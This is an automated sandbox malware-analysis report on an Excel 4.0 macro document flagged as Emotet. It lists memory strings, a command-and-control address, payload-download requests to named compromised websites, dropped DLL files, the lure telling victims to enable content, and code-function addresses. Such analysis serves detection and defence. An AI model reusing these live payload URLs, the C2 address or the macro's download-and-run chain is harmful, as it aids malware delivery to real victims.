                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219171060.0000000000368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219212394.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmeroZe
                      Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enR
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/
                      Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/5v
                      Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/=v
                      Source: regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/KP
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/l
                      Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/
                      Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/.t
                      Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/1o
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/L
                      Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/h
                      Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: learnviaonline.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C InternetReadFile,4_2_0000000180017C8C
                      Source: global trafficHTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Found malicious Excel 4.0 Macro
                      Source: DETAILS 25922194612.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: DETAILS 25922194612.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file
                      Found Excel 4.0 Macro with suspicious formulas
                      Source: DETAILS 25922194612.xlsInitial sample: EXEC
                      Source: DETAILS 25922194612.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\KuSAkvGE\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D212B03_2_000007FEF9D212B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25E013_2_000007FEF9D25E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25CAD3_2_000007FEF9D25CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D268503_2_000007FEF9D26850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2443C3_2_000007FEF9D2443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D253FB3_2_000007FEF9D253FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D24A703_2_000007FEF9D24A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002B00003_2_002B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800264103_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025C303_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D583_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180011E5C3_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C6C83_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C2C83_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026F143_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800163203_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800013783_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018FE83_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ABE83_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243F43_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083F83_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800247FC3_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DBFC3_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001100C3_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180027C283_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002143C3_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001303C3_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A8403_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800038403_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B4443_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F0483_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AC4C3_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800100503_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800030503_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000445C3_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C85C3_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800034603_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029C6C3_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001586C3_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000406C3_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E06C3_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC703_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001447C3_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026C803_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C843_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160883_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800028883_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017C8C3_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FC8C3_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002D0983_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154B83_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180011CCC3_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064D03_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800180D43_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800054D83_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002CCE03_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800254E43_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800184E83_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800010E83_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E8F03_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A0F83_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800199003_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800119043_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F9083_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002490C3_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001890C3_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001D5103_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180003D183_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002191C3_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001D1283_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D12C3_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800149303_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085343_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CD443_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B9483_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000796C3_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800105903_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D943_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800091A83_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800171B83_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018DBC3_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800141C83_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B1D43_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023DDC3_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800165E43_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029DF03_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015DF43_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800011F43_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FE083_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180027E143_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B6183_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800232203_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020A343_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076343_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022E383_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E6383_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800102503_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A643_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800042643_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800136743_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F6783_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E2783_2_000000018000E278
